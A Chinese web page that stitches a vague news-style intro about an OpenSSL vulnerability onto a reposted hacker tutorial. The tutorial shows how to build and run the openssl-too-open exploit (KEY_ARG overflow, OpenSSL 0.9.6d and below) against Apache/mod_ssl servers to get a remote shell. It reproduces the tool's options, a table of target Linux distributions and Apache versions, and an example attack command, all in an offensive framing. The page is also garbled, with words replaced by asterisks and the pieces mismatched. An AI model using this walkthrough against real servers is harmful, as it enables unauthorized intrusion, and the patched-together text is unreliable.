openssl漏洞是apache还是php openssl漏洞

【openssl漏洞是apache还是php openssl漏洞】最近 , 关于openssl漏洞的新闻引起了广泛关注 。openssl是一种非常流行的加密库 , 被广泛用于保护网络通信和数据传输的安全性 。然而 , 最近曝光的漏洞让人们对其高度依赖的安全性产生了担忧 。据报道 , 这个漏洞可能导致黑客能够获取用户的敏感信息 , 如密码和信用卡号 。这个漏洞对于个人和组织来说都是一种严重的威胁 , 需要尽快修复和更新openssl软件 。在这篇文章中 , 我们将探讨这个漏洞的影响 , 以及如何保护自己免受潜在攻击 。

openssl漏洞是apache还是php openssl漏洞

文章插图
如何用程序扫描openssl漏洞主机apache_openssl漏洞的利用及权限的提升
apache_openssl漏洞的利用及权限的提升

--nightcat
转载请保持文章完整

第一部分:获得shell.

在packetstorm玩了一段时间 , 遇到有openssl-too-open.tar.gz这个exploit.
现在看看软件包的描述:
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability*** ysis

这个描述说明这个exploit 是openssl v 0.9.6的key_arg的漏洞来达到溢出的目的 。不过也要
注意apache/mod_ssl的版本信息 。对于大多数的有这样条件的都能溢出成功 。取得一个id是
nobody shell,有些甚至是root的权限 。软件包里面有一个扫描器,exploit 。

好象听起来很诱人 , down回来研究一下 。
nightcat@nightcat$tar -zxvf openssl-too-open.tar.gz
nightcat@nightcat$cd openssl-too-open
Makefile README linux-x86.c main.c main.h scanner.c ssl2.c ssl2.h

习惯性的要读一下软件包的REAMDE文件 。
nightcat@nightcat$ more README
得到一些有用的信息:
1.编译的 *** :
直接make就可以 , 之后就可以得到openssl-too-open和openssl-scanner

2.openssl-too-open的用法:
Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode

Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)

/****想成功 , 就要看准系统类型 和apache版本号
*****如果是 0x07 - RedHat Linux 7.0 (apache-1.3.12-25):
*****./epenssl-too-open -a 0x07 ip .就应该可以啦!
****/

3.openssl-scanner的用法:
Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts

推荐阅读